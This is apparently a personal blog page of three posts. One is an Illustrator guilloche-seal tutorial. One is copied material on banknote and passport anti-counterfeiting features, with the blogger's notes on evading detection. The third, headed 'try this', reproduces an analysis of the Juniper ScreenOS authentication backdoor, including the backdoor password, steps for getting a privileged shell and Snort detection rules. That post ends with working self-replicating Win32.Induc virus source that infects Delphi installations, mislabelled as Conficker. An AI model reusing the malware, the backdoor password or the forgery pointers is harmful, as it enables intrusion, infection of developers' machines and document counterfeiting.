Wednesday, November 15, 2017

ok, no more than 6 gov. contractors with commercial software ! We will skip their control...Create a Security Seal in Illustrator Using Guilloche Patterns

In this tutorial you'll learn how to create a security seal using Guilloche, the artistic technique that is typically used in banknote design and other documents to prevent them from being forged.
According to Wikipedia, "Guilloche is a decorative engraving technique in which a very precise intricate repetitive pattern or design is mechanically engraved into an underlying material with fine detail. Specifically, it involves a technique of engine turning, called guilloché in French after the French engineer 'Guillot', who invented a machine 'that could scratch fine patterns and designs on metallic surfaces'. The machine improved upon the more time-consuming practice of making similar designs by hand, allowing for greater delicacy, precision, and closeness of the line, as well as greater speed."
Surely there's a Guilloche design in your everyday life. Bills, checks, ID cards, passports, driver licenses and several documents including academic diplomas or certificates. Any kind of document that requires some complex graphics to avoid being forged, are using Guilloche in some way or another.
This lost art is still kept alive due to the necessity of authenticating a paper that has some value and there are companies dedicated to this job. Securency is a global company specialized in creating designs for banknotes in over 22 countries: securency.com.au/.
Googling "guilloche" you'll find many images related to this technique, and even some free or pay apps for these creations. Guilloche Pattern Generator allows you to create a guilloche rosette online, but only exports a low-resolution JPG. Anyway it's interesting to spend some time creating different patterns to understand better the technique: subblue.com/projects/guilloche.
Excentro is Mac OS software for creating all kinds of elements using Guilloche. This app seems to be very complete, but it costs $500, a bit expensive for a tool that we'll use occasionally: excourse.com/excentro/.
Other apps such as Cerberus GuardSoft are specific to companies involved in the creation of banknotes and documents, and in this case the price is not published on its website, but is likely higher than Excentro's: guard-soft.com/cerberus.html.
In our tutorial we'll create a fictitious Security Seal that may be used in diplomas, certificates, or seals for software or an original DVD. Since the amount of patterns that can be made with Illustrator are unlimited, we'll explain only some basic designs for you to know how they can be made and then you can investigate on your own how to create new patterns.
One of the most important starting tasks is to create a grid that will help us to draw objects as accurately as possible. The dimensions of the document are important and also the use of guides to mark the exact center of the workspace.
Then we'll create a new 800 by 800 px document. In Edit > Preferences we'll set two things: the measure unit in pixels, and size/color of the Grid. We need a grid of 100 pixels subdivided to 10, obtaining small 10 px squares. Use a not very dark color to help you have the grid always visible without bothering your sight.
It's also important that at many steps of our exercise you ask Illustrator to place an object snapped to the grid, or you can hide/show it all the time and the same with the exact center of the document guides. There will be some mechanic tasks that will require extreme precision and that's why we'll use all that help and guidance in our drawing job.
In a 800 by 800 px document with a grid of 10px and Guides in the center, we'll draw an oval of 80px width and 200 px height, aligned with our vertical guide and touching the top of the document.
Dragging an object with the grid visible makes it stick to the grid to be finally placed with accuracy. This oval has no fill color, just a stroke of 0.25 points and a Black color at 80%.
In the exact middle point (we hide our guides so you can see better) draw a cross that will help you turn the oval using the document axis.
While pressing Alt + Shift, drag the oval to the opposite side. The Alt key will duplicate the original object and Shift moves it through a straight line.
We group both ovals with the cross and double-click on the Rotate tool, which will open its options window. We'll rotate our group 2 degrees making a copy and leaving the original where it is.
A keyboard shortcut that we'll use often in this tut is Command + D. Once we rotate a copy of our group, press Command + D to create more copies with the same rotation angle. Will start to see what was the purpose of this group of items as we keep pressing Command + D.
We took a full turn of 360° rotating 2 ovals and this is the first outcome of our tutorial, a basic Gulloche rosette pattern. We remove all the crosses as we only used them to help us with the group duplication. Delete all of them using the Group Selection Tool.
We need our pattern not to look so basic so we'll remove some of the ovals. Double-clicking on our first oval will select the opposite one. Delete the group.
Going clockwise you must delete 1 group of ovals and leave the following 6. This action will make equal blank spaces across the pattern.
This is the final look of this task. Now our pattern isn't basic and it looks a bit elaborate. We shall see later whether to modify the stroke weight, but first let's get all the necessary elements for a later edition once we have it all.
In a new layer we'll cover a large part of the rosette with a 740 px circle, filled with a white color, and using the same stroke of 0.25 pt and black color at 80%.
Now create a copy that is 97% smaller by selecting the circle and double-clicking on the Scale tool. Again we'll make a copy to preserve the original object.
Go to Window > Pathfinder, and while selecting both circles we'll choose Divide. This action cuts both circles into two different objects.
We'll separate this group with Object > Ungroup, then select the outer ring you will cut and paste it into a new layer, thus leaving the other circle in a layer below it.
Between the ring and the circle we'll repeat the task of creating a rosette, this time smaller and thinner than before. Then repeat the previous steps of duplicating this new oval and draw a cross for reference.
Since our ovals are narrower, this time the pattern will be tighter. With Command + D, repeat the rotation of 2 degrees as we did before to complete the whole 360° rotation.
Taking a look to what we have drawn so far, we'll notice that it's giving us some cool results. At this point we have a typical guilloche style pattern, but we'll continue to create more complex forms in this exercise.
Let's draw a 36 points star. Select the Star tool, click on the exact center of the document, and then fill the options with these sizes and amount of points.
We'll round the star corners in Effect > Stylize > Round Corners.
Use a radius of 20 pixels in the options box.
Illustrator creates Appearances on objects, giving another look to an objet without destroying the original. So you'll see that the star still has its points, but they look curved. In the next steps we will remove that appearance, but for now we'll continue this way. What we have to do now is make a copy of our star, but 50% smaller. With the star selected double-click on the Rotate tool to enter these values.
Now we work with the Blend Tool. Select both stars and then click on an edge of the bigger star.
Clicking on the same tip of the smaller star we'll see the mixing effects between two objects. We will modify that.
Double-clicking on the Blend tool will show its options. We need 30 steps of blending.
We get another classic Guilloche pattern: the Oyster. To hide the outer edge of this pattern we'll create a solid stroke above it.
Select both stars and go to Object > Expand Appearance. Now we can copy and paste the bigger star in a new layer.
There we will apply a 9 points stroke on our new star, and will convert this line into curves by going to Object > Path > Outline Stroke.
With the Eyedropper Tool we can click on another element of the tut and give the same values to the new one. First select it and then choose another item to obtain the same appearance.
Now let's draw a line around this star we've got. Using the Line Segment tool we will create a vertical line at the exact middle of the file. Hide the central guides by going to View > Guides > Hide Guides for a better view.
Since the star had 36 points, we'll repeatedly copy this line until you get 36 lines rotated 10°, each to complete the whole 360°.
Remember that we can also use Command + D here to duplicate the turned line. You will see that these new lines match with the curved edge of the star.
Now we group these lines by selecting them and pressing Command + G or by going to Object > Group. And again we'll make a copy of this group, but only using 5° of rotation.
This has filled the spaces between lines with other lines. We'll reduce them a bit to match the stroke of the star without exceeding that area.
Now we'll select the first set of matching lines with the star edges. Now change the stroke color to black and increase the weight to 3 points.
Finally, we'll make a copy of the smaller star placed in some layer below. We'll paste it over all and we'll rotate this new element 5° matching the star edges with the dark strokes created before.
In a new layer we'll create a 200 px circle with black color at 80%. With the Ellipse tool, click on the document and write these values in its window. Then place the circle in the exact center.
Now we'll use a very interesting tool of Illustrator: Scribble. Go to Effect > Stylize > Scribble with our circle selected.
In the Scribble Options dialog box enter these values. This action creates symmetrical curves within the circle using its fill color to draw some lines with an ornamental look.
With simple steps we get a spherical shape made of moire lines. Using other figures and playing with parameters, you'll find interesting uses of the Scribble tool in the Guilloche style.
Now create a 660 px circle with the Ellipse Tool. Select that tool and click on the workspace to open its window and enter the exact value. Once you've drawn this circle, you can accurately center it with a simple trick: pressing Command + 1 will exactly center your screen. Then select your circle, press Command + X (Cut), then Command + V (Paste), and Illustrator will place the object perfectly centered into your document.
We'll increase the circle stroke to 80 points using the same color all over the work, with 80% black.
Now let's draw a new circle where you'll apply a text that surrounds the previous circle. We repeat the above steps, but this time draw a 645 px circle.
Choose the Type on a Path Tool and click on the top point of the circle. This makes a text field so we can start writing.
Using the Times New Roman Bold font at 21 point size, start to write the text and then select it with the Type tool in regular version. Then press Command + C one time and Command + V several times to duplicate it.
To approximate the distance between first and last copied text, we'll increase text tracking to 33. The tracking value will depend on the text you type, and our purpose is to create a continuous text as united as possible from beginning to end.
Be sure to use a new layer for each object that we created because that helps to edit the file later. Now create a "V" using Times New Roman Bold at 450 pt. Try to align this letter leaving 2 large areas on its bottom sides to enter additional text. Then convert it into outlines by applying Type > Create Outlines.
Then we'll create a wave pattern to fill our V. Select the Line Segment tool in the toolbar and click on the screen to open the editing window, entering these values. Apply to this line 0.25 pt weight and 80% black. Then select it and press Shift + Alt, then drag a few pixels down. Now duplicate this action with Command + D to create a straight lines pattern.
Select all lines and go to Effect > Distort & Transform > Zig Zag. In that window, enter these parameters and press OK.
We'll use our V to mask this pattern. Copy the V we made earlier and paste it into the lines pattern layer. To create a mask with this vector always place it above the object to mask, and remove any fill or stroke leaving this vector completely transparent. Select the pattern and the V and go to Object > Clipping Mask > Make or press Command + 7.
In order to properly show the pattern on the V we should change its color to white. To select objects within a mask you can use the Group Selection Tool.
Let's create another pattern for the filling of our V. Draw a circle at 280 pixels, align it with the vertical guide and 60 pixels away from the top of our document.
Choose the Rotate Tool and click on the lowest point of the circle. Your cursor will change from a cross to a black arrow, taking that point as the rotation axis. Now press the Alt key and you'll see how the cursor changes to a double arrow, indicating that the object will be duplicated. With the Info window open, make sure to rotate the copied object as close as possible to 6°.
With Command + D you will repeat this action to complete a 360° rotation.
This is the result of what we just did, a new rosette pattern normally used in Guilloche designs. We'll also change the stroke color to white.
Increase the thickness of the strokes to 0.5 points to get a better contrast from the wave lines pattern. We'll mask our rosette in the same way as we did with the previous pattern, and make sure to place the rosette center in a non-visible area inside the mask, because at that spot there is a lot of lines, and it won't look good inside our V.
Zooming in with Command + we can appreciate the details in our V. This combination of patterns is used very often in Guilloche style work.
In a new layer we'll copy and paste our V again to create a stroke around it. Select and go to Object > Path > Offset Path and enter these parameters in the editing window:
Offset Path creates another object behind the original, grouping both. We'll use just the outer stroke so we must split these vectors. To ungroup them, go to Window > Pathfinder and choose the Divide option. This cuts both objects separately and we can remove the inner vector to preserve the other.
With Alt + Shift we'll create a copy upward to the left top to create a 3D extrusion. Then fill it with white and black at 80% color stroke with 0.25 pt weight.
Now we finish our label edition by adding a gradient in the outer morphed star behind the V. Since these are 2 objects joined with the Blend Tool, what we do with the outer shape will affect the morph with the inner shape. So let's fill the big star with 20% black and white 0.5 pt stroke. We'll also change the small star's stroke with the same values as the big one, but keeping its white color fill.
Let's edit a final text in our seal, drawing a 300 px circle centered on our document.
Previously you must download and install this font in your OS: dafont.com/united-states.font. It's a similar font to the one used in dollar bills.
Select Type on a Path Tool and click on the top of the circle, then begin to write using our new font at 21 pt, always using black 80%.
Selecting this new text path, click on the tool and this will open its window where you'll choose these options. By selecting the Flip option our text will use the inner side of the path.
With the Selection Tool you can drag that little line at the beginning of the text. That will allow you to move the text within the path to your desired position.
Since we want this text not to be overlapped with the V letter, we'll add some blank space typing with the space bar.
If for some reason your text doesn't fill the whole path, you can edit the text tracking for better results. In this case the text exceeds the space and we had to reduce the tracking in order not to touch the V.
Once we finish, we'll add a Drop Shadow on the text. Go to Effect > Stylize > Drop Shadow.
Advertisement
We'll reduce the blur to zero because smooth shadows aren't a style used in Guilloche. Enter the other parameters of this capture and press OK:
Finally, we've got a realistic Guilloche seal working with Illustrator and certain precision tricks used in this style. Now that you've learned some techniques, you can observe Guilloche designs and try to replicate those that inspire you later with vectors.
Black at 80% gives a smooth look to the seal and brings better integration between shapes. You should try to paint each layer with a different color, because a multicolor guilloche seal is also helpful for counterfeiting prevention due to the prints complexity.
Don't forget to play around with Copy + Rotate in simple shapes to create new rosettes and know all the creative possibilities of the Blend Tool, Moire Scribble, Wave Patterns and Shapes with Rounded Corners, like the stars we drew.
You can view the final image below or view a larger version here.

Guilloche design is a pattern of computer-generated fine lines that forms a unique image. This image can only be reproduced with access to the original software and parameters used to create it in the first place



Tuesday, November 14, 2017

and BINGO! encryption! called anti patterns

Anti Counterfeit Measures

Technology gets better every year. Every year computers get faster, more powerful, and more efficient. I’m sure you are all familiar with Moore’s Law (Number of transistors that can be squashed onto a computer chip doubling every 12-18 months).
It’s not just microprocessors, it’s all the peripherals too. Every time I look at upgrading my PC, the default hard drive size available (for the same price) has increased from the last time (and now solid-state drives are starting to become the norm). Screen sizes and resolutions also increase over time.
Every time I read the specs on the next generation smart phones, the built in cameras seem to have more Megapixels than ever before.
Scanners, digital printers, and photocopiers (which, these days, are simply composite hybrids of the other two) are also far superior than previous years’ models.
It’s now possible to print out photographic-lab quality prints from the comfort of your own home. This is great if you have cute and adorable children …
… but bad if you are in the bank note business. What’s to stop people scanning in a bank note, printing it out in high resolution and trying to pass it off as real?
Actually, quite a lot. Attempting to counterfeit (or forge) money is a very serious offence. Depending on where you live, it can be felonious or treasonous; no good can come of it. This posting is intended to educate you about technology embedded into the bank notes; it’s not designed to challenge you to break any laws. Don’t do it. I hope my readers are smarter than that.

Technology to the rescue

Technology might have caused problems, but technology is also employed to help neutralize the threat. A modern bank-note is an incredibly sophisticated device. Special kinds of paper (and sometimes plastic) are used to manufacture bank notes, as are special inks.
Some of these inks change colors depending the angle you look at them. Some inks can be made sensitive to heat and change color. Some inks are thick and their presence can be detected under fingers and thumbs. The ink can be magnetic to allow detection by machine, or be sensitive to non-visible light, or made to fluoresce under UV.
‘Water-marks’ can be embedded into the paper during manufacture, and/or threads, fibers, metals strips, stripes or other contrasting substances weaved inside. The printed designs are made very intricate, requiring high resolution printers to duplicate, and the spacing of lines in the engraved patterns are cleverly spaced so that if they are scanned at lower resolution, then moiré patterns will appear in the designs. Multicolored inks with subtle transitions can be employed and even foil and holograms included. Of course, all bank notes have unique serial numbers too.
Bank notes can be peppered with patterns of micro-perforations drilled by lasers, or be imprinted or embossed to raise letters. A good list of current techniques used to protect bank notes can be found here.
However one of the most interesting counterfeit prevention devices, and the topic of this post, is a construct known colloquially as the “Eurion constellation“. It’s a special pattern of dots that is baked into design of bank notes to allow scanning devices to identify the image of being a bank note (see right).
You might not have noticed them, or been aware they are they, but they are hidden in plain sight. It’s one of those things that, once you’ve seen, you can never unsee.
Warning: Once you’ve read this article, you will never look at a bank note the same way again!

Eurion Constellation

The term “Eurion” is a Portmanteau of the prefix “Euro” and the word “Orion”.
Euro, because some of the first applications the constellation were on the Euro bank notes, and Orion, because the design, as we will see, looks slightly similar to the celestial constellation Orion.
Information of the true nature of the design, and its history, are hard to come by. In a ‘security in layers’ approach, the details of this design are hard to come by. A little investigation reveals that the design of this system can be traced back to a Japanese company called Omron, and in 1995, this company was granted a US patent US 5845008 A, entitled Image processing device and method for identifying an input image, and copier scanner and printer including same.

What is it?

A Eurion constellation is a collection of five rings, printed in a contrasting ink, in the design of the bank note. The diameter of the rings, and their relative positions are, clearly, critically important to the design and function, however, as the specification is a secret I’m not aware of the formal dimensions (even if I were, I’d probably not document them here). If you are interested, pick up a bank note from your pocket and look at the patterns yourself.

Image: Images Money
These patterns are often repeated many times over the bills and at different rotations.
Here is an example, and I've highlighted a couple of the constellations.

What do they do?

These dot patterns form a finger print that scanners (more specifically, the scanning software) can detect. If these patterns are detected, rather the following through with allowing the digitization or printing of the note, the peripheral can display a smug error message along the lines “I know what you’re trying to do, and I’m not going to let you because that is a very naughty thing”
Clearly there is some high-level collaboration going on between governments (who officially print money), and each of the different hardware/software manufacturers of these peripherals.

(Research articles on the web suggests that the currency-detection algorithms implemented by software packages are sophisticated and multi-level. Obfuscation of the Eurion, distortion, or even removal in some cases, still allows the package to detect that the image is that of currency. This implies other detection techniques are also employed).

Examples

Below are a collection of notes which feature these Omron patterns. This is not intended to be an exhaustive list of all the notes, but just to show how widely this Omron technology is used. Be honest, have you seen them before? Can you find the constellations in each of the designs below?
Take some notes out of your pocket, and see if you can find some other constellations right now!
Sometimes the constellation is hiding in plain sight. Sometimes they are just part of the background texture.
In the image on the left, the Omron circles are 'disguised' as the zeros from the constellation of 50s on the $50 bill. If you look closely, you can see the font of the two digits are different. The 'zero' is a circle (This is even more noticeable on other denominations).
On the right, you can see they have been cleverly incorporated as musical notes on a stave.

Other users

I’ve heard, anecdotally, that these designs might also now be encapsulated into some designs of other official government documents, such as birth certificates. I've not come across any, but it would probably be a worrying trend if people did start to embed these into their everyday documents so that they could not be scanned or copied. If lots of people started doing it, then copiers and scanner would become less useful and, inevitably, patches are work-arounds would be created to bypass these security measures (After all inconvenience does not scale).
Once work-arounds become popular, the protection becomes irrelevant.

They also use ...optically variable ink. This is ink that changes colour depending on the light used to look at it.


Paper type : UV dull paper is a special kind of paper that does not reflect ultraviolet light


this is what shows on their detetion system, on passports flourescent micro fibers


Ok, everybody , they detect by invisi ble fibers on the paper , under UV light it must show the colours yellow, green and red

SecureGuard™ DOCUMENT SECURITY FEATURES ..... and How They Work


UV FIBER SECURETM Security Feature

SECURITY FIBER TECHNOLOGY 

Invisible Fluorescent Fibers
Invisible fibers are made visible when viewed under "black light."
[covert security feature]


Invisible Fibers Under Normal Light


Invisible Fibers Under Black Light

http://www.highsecuritypaper.com/features--fiber.html

Thursday, November 9, 2017

try this


Juniper ScreenOS Authentication Backdoor - A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.

Juniper's advisory mentioned that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected. Juniper provided a new 6.2.0 and 6.3.0 build, but also rebuilt older packages that omit the backdoor code. The rebuilt older packages have the "b" suffix to the version and have a minimal set of changes, making them the best candidate for analysis. In order to analyze the firmware, it must be unpacked and then decompressed. The firmware is distributed as a ZIP file that contains a single binary. This binary is a decompression stub followed by a gzip-compressed kernel. The x86 images can be extracted easily with binwalk, but the XScale images require a bit more work. ScreenOS is not based on Linux or BSD, but runs as a single monolithic kernel. The SSG500 firmware uses the x86 architecture, while the SSG5 and SSG20 firmware uses the XScale (ARMB) architecture. The decompressed kernel can be loaded into IDA Pro for analysis. As part of the analysis effort, we have made decompressed binaries available in a GitHub repository.
Although most folks are more familiar with x86 than ARM, the ARM binaries are significantly easier to compare due to minimal changes in the compiler output. In order to load the SSG5 (ssg5ssg20.6.3.0r19.0.bin) firmware into IDA, the ARMB CPU should be selected, with a load address of 0x80000 and a file offset of 0x20. Once the binary is loaded, it helps to identify and tag common functions. Searching for the text "strcmp" finds a static string that is referenced in the sub_ED7D94 function. Looking at the strings output, we can see some interesting string references, including auth_admin_ssh_special and auth_admin_internal. Searching for auth_admin_internal finds the sub_13DBEC function. This function has a strcmp call that is not present in the 6.3.0r19b firmware:

The argument to the strcmp call is <<< %s(un='%s') = %u, which is the backdoor password, and was presumably chosen so that it would be mistaken for one of the many other debug format strings in the code. This password allows an attacker to bypass authentication through SSH and Telnet. If you want to test this issue by hand, telnet or ssh to a Netscreen device, specify any username, and the backdoor password. If the device is vulnerable, you should receive an interactive shell with the highest privileges.
The interesting thing about this backdoor is not the simplicity, but the timing. Juniper's advisory claimed that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected, but the authentication backdoor is not actually present in older versions of ScreenOS. We were unable to identify this backdoor in versions 6.2.0r15, 6.2.0r16, 6.2.0r18 and it is probably safe to say that the entire 6.2.0 series was not affected by this issue (although the VPN issue was present). We were also unable to identify the authentication backdoor in versions 6.3.0r12 or 6.3.0r14. We could confirm that versions 6.3.0r17 and 6.3.0r19 were affected, but were not able to track down 6.3.0r15 or 6.3.0r16. This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).
Detecting the exploitation of this issue is non-trivial, but there are a couple things you can do. Juniper provided guidance on what the logs from a successful intrusion would look like:
2015-12-17 09:00:00 system warn 00515 Admin user system has logged on via SSH from …..
2015-12-17 09:00:00 system warn 00528 SSH: Password authentication successful for admin user username2 at host 
 
Although an attacker could delete the logs once they gain access, any logs sent to a centralized logging server (or SIEM) would be captured, and could be used to trigger an alert.
Fox-IT has a created a set of Snort rules that can detect access with the backdoor password over Telnet and fire on any connection to a ScreenOS Telnet or SSH service:
# Signatures to detect successful abuse of the Juniper backdoor password over telnet.
# Additionally a signature for detecting world reachable ScreenOS devices over SSH. 

alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Flowbit - Juniper ScreenOS telnet (noalert)"; flow:established,to_client; content:"Remote Management Console|0d0a|"; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;)

alert tcp any any -> $HOME_NET 23 (msg:"FOX-SRT - Backdoor - Juniper ScreenOS telnet backdoor password attempt"; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:"|3c3c3c20257328756e3d2725732729203d202575|"; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;)

alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Backdoor - Juniper ScreenOS successful logon"; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:"-> "; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;)

alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:"FOX-SRT - Policy - Juniper ScreenOS SSH world reachable"; flow:to_client,established; content:"SSH-2.0-NetScreen"; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;)
 
Robert Nunley has created a set of Sagan rules for this issue:
If you are trying to update a ScreenOS system and are running into issues with the signing key, take a look at Steve Puluka's blog post.
We would like to thank Ralf-Philipp Weinmann of Comsecuris for his help with unpacking and analyzing the firmware and Maarten Boone of Fox-IT for confirming our findings and providing the Snort rules above.
Update: Fox-IT reached out and confirmed that any username can be used via Telnet or SSH with the backdoor password, regardless of whether it is valid or not.
Update: Juniper has confirmed that the authentication backdoor only applies to revisions 6.3.0r17, 6.3.0r18, 6.3.0r19, and 6.3.0r20~

source" code ripped from "infected" sysconst.dcu is below WIN32.INDUC2 WORM (conficker...)

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s',
'=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c<>#0 do begin r:=r+c;inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');
https://forum.sysinternals.com/win32induc-using-you-as-malware-generator_topic20062.html